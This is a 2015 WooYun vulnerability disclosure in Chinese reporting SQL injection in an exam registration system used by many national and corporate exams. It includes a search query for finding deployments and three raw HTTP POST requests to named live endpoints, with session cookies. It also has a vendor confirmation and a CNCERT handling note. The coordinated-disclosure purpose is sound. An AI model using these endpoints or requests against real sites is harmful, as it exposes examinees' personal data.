当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0118190

漏洞标题:某考试网上报名系统漏洞(涉及国家考试多个行业)

相关厂商:ata.net.cn

漏洞作者: 路人甲

提交时间:2015-06-11 10:57

修复时间:2015-09-14 10:44

公开时间:2015-09-14 10:44

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-11: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-19: 细节向第三方安全合作伙伴开放
2015-08-10: 细节向核心白帽子及相关领域专家公开
2015-08-20: 细节向普通白帽子公开
2015-08-30: 细节向实习白帽子公开
2015-09-14: 细节向公众公开

简要描述:

很多公司和国家考试报名都使用的是这套系统。
随便的关键字搜索能搜索到2690个,里面的数据量超大,都是考生信息。

详细说明:

1、有很多公司和国家考试都使用的是这套系统。
具体可以搜索百度:http://www.baidu.com/s?ie=UTF-8&wd=Copyright+ATA+1999-2008.+All+Rights+Reserved

1.jpg


2、在登录页面随便输入账号信息-----抓包-,或者注册账号----抓包。
post包传输的是 JSON格式数据,系统没有对 JSON做过滤,导致注入

漏洞证明:

3、案例一
sac证券从业人员资格考试网上报名系统sql注入漏洞,内含全国考生信息
http://sac.ata.net.cn/SGZJ05newREG/

POST /SGZJ05NEWREG/ajaxpro/ETX.WebSite.ASCX.AX_CandidateProfileInfo,ETX.WebSite.ashx HTTP/1.1
Accept: */*
Content-Type: text/plain; charset=utf-8
X-AjaxPro-Method: CheckCredentialsCodeIsExist
Referer: http://sac.ata.net.cn/SGZJ05newREG/SignIn/SI_Candidate.aspx#
Accept-Language: en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: sac.ata.net.cn
Content-Length: 98
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: BIGipServerIN_PSVR_SGZJ05=688629952.543.0000; ASP.NET_SessionId=llva4yqt2hh2ueu2vcksoqaw; __utmt=1; __utma=67276563.1057119698.1433061032.1433061032.1433061032.1; __utmb=67276563.9.10.1433061032; __utmc=67276563; __utmz=67276563.1433061032.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); Hm_lvt_a98fdf3d087689affdc92ebb44fcf038=1433061105,1433061259; Hm_lpvt_a98fdf3d087689affdc92ebb44fcf038=1433061289
{"mCertType":"2","mCertCode":"123123","mCandidateName":"?????????","mFirstName":"","mLastName":""}


1.jpg


案例二
联通校园招聘考试
http://10010.ata.net.cn/XYKS63REG/Candidate/C_SignIn.aspx?code=20131102

POST /XYKS63reg/ajaxpro/ETX.WebSite.Candidate.C_SignIn,ETX.WebSite.ashx HTTP/1.1
Accept: */*
Content-Type: text/plain; charset=utf-8
X-AjaxPro-Method: CandidateLogon
Referer: http://10010.ata.net.cn/XYKS63REG/Candidate/C_SignIn.aspx?code=20131102
Accept-Language: en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: 10010.ata.net.cn
Content-Length: 85
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utmt=1; __utma=202195265.1909139599.1433330793.1433330793.1433330793.1; __utmb=202195265.20.10.1433330793; __utmc=202195265; __utmz=202195265.1433330793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); ASPSESSIONIDQACAATQT=PNJBJMOCEPNMDFLOPNFKANHB; BIGipServerIN_PSVR_XYKS54=202090688.63262.0000; ASP.NET_SessionId=nowfyq55dext4f45bguwhl45
{"credentialsType":"1","credentialsID":"123123123123123123","companycode":"20131102"}


1.jpg


案例三
百度搜索第一个
“医药代表专业培训”(MRC)考试
http://sgtd05.ata.net.cn/SGTD05REG/Candidate/C_SignIn.aspx?code=140222

POST /SGTD05reg/ajaxpro/ETX.WebSite.Candidate.C_SignIn,ETX.WebSite.ashx HTTP/1.1
Accept: */*
Content-Type: text/plain; charset=utf-8
X-AjaxPro-Method: CandidateLogon
Referer: http://sgtd05.ata.net.cn/SGTD05REG/Candidate/C_SignIn.aspx?code=140222
Accept-Language: en-US,en;q=0.8,zh-Hans-CN;q=0.5,zh-Hans;q=0.3
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.3; WOW64; Trident/8.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; InfoPath.3)
Host: sgtd05.ata.net.cn
Content-Length: 78
Proxy-Connection: Keep-Alive
Pragma: no-cache
Cookie: __utma=202195265.1909139599.1433330793.1433330793.1433330793.1; __utmb=202195265.22.10.1433330793; __utmc=202195265; __utmz=202195265.1433330793.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); BIGipServerIN_PSVR_Others1=319531200.1567.0000; ASP.NET_SessionId=ggaj4h45b1cxx045qwpw3a45
{"credentialsType":"1","credentialsID":"aaaaaaaaaaaaa","companycode":"140222"}


1.jpg


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-06-16 10:43

厂商回复:

CNVD确认并复现所述情况,已经将涉及的案例转由CNCERT向相关信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无